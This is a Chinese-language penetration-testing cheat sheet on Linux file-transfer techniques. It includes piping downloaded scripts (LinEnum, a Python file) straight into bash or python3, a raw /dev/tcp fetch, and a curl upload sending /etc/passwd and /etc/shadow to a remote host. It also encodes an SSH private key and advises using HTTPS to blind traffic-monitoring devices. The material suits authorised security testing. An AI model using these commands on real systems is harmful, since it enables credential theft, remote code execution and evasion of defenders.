渗透测试--Linux下的文件传输方法
渗透测试过程中,我们经常会需要文件传输,本文主要探讨Linux主机上我们对文件传输的方法。
编码方式
Linux 检查MD5
md5sum id_rsaLinux Base64 编码/解码
编码
cat id_rsa |base64 -w 0;echo解码
echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsapython搭建HTTP服务器
pip3 install uploadserver
python3 -m uploadserverpython3
python3 -m http.serverpython2.7
python2.7 -m SimpleHTTPServerPHP搭建HTTP服务器
php -S 0.0.0.0:8000Ruby搭建HTTP服务器
ruby -run -ehttpd . -p8000wget下载
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.shcurl下载
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shcurl无文件下载
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bashwget无文件下载
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3Hello World!bash 下载
很多情况下,一台服务器不会存在下载工具。那么我们就只能使用最基本的bash完成下载任务了。
##连接目标服务器
exec 3<>/dev/tcp/10.10.10.32/80##HTTP GET请求
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3##打印响应
cat <&3创建自签名证书
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'创建HTTPS服务器
HTTPS服务器很好解决了流量加密问题。这点在渗透时,若果别人有流量捕捉机器的时候,显得尤为重要,因为如果态势感知设备没有导入我们的证书,那么他们将无法解密流量。
sudo python3 -m uploadserver 443 --server-certificate ~/server.pemcurl上传
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecureSSH启用
sudo systemctl enable sshsudo systemctl start sshScp下载/上传
该下载方法必须启用ssh,使用方法
scp plaintext@192.168.49.128:/root/myroot.txt ./myroot.txtPyhton Linux解压文件
瘾小生碰到过一个情况,登录了Linux系统后,发现既没有unzip也没有7z,那zip文件怎么解压呢?有幸的是,python可以帮助我们解压。
python3 -c "import zipfile; zipfile.ZipFile('xxx.zip').extractall()"